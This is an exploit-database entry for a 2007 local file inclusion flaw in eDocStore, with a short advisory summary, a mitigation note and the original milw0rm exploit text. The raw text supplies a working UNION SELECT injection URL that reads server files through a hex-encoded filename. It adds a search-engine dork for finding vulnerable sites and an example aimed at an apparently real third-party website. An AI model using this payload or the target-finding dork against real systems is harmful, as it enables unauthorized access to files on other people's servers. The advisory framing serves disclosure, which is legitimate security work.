header-logo
Suggest Exploit
vendor:
eDocStore
by:
t0pP8uZz & xprog
5.5
CVSS
MEDIUM
Local File Inclusion
22
CWE
Product Name: eDocStore
Affected Version From: Unknown
Affected Version To: Latest versions
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

eDocStore Latest Versions Local File Inclusion Vulnerability

This vulnerability allows an attacker to include local files on the server by manipulating the 'doc_id' parameter in the URL. By replacing the first hex value before the comma, an attacker can include any file on the server.

Mitigation:

The vendor should sanitize user input and validate file inclusion paths to prevent this vulnerability. Users should update to the latest patched version.
Source

Exploit-DB raw data:

--==+================================================================================+==--
--==+            eDocStore Latest Versions Local File Inclusion Vulnerbilitys        +==--
--==+================================================================================+==--


AUTHOR: t0pP8uZz & xprog (good work xprog)

SCRIPT DOWNLOAD: N/A

SITE: http://www.edocstore.co.uk

DORK: intext:"Powered by eDocStore"


EXPLOITS:

EXPLOIT 1: http://www.server.com/essentials/minutes/doc.php?action=inline&doc_id=-1%20UNION%20ALL%20SELECT%200x2E2E2F696E6465782E706870,0x746578742F706C61696E,null,null,null,null,null


EXAMPLES:

EXAMPLE 1: http://www.nwal.org/essentials/minutes/doc.php?action=inline&doc_id=-1%20UNION%20ALL%20SELECT%200x2E2E2F696E6465782E706870,0x746578742F706C61696E,null,null,null,null,null

Note/Tip: The filename for the incluson has got to be hexed before you can include it.
Its only required to replace the first hex value before the ","

GREETZ: h4cky0u.org, G0t-Root.Net

FROM GM: Kw3[R]ln Get over it!

--==+================================================================================+==--
--==+            eDocStore Latest Versions Local File Inclusion Vulnerbilitys        +==--
--==+================================================================================+==--

# milw0rm.com [2007-06-25]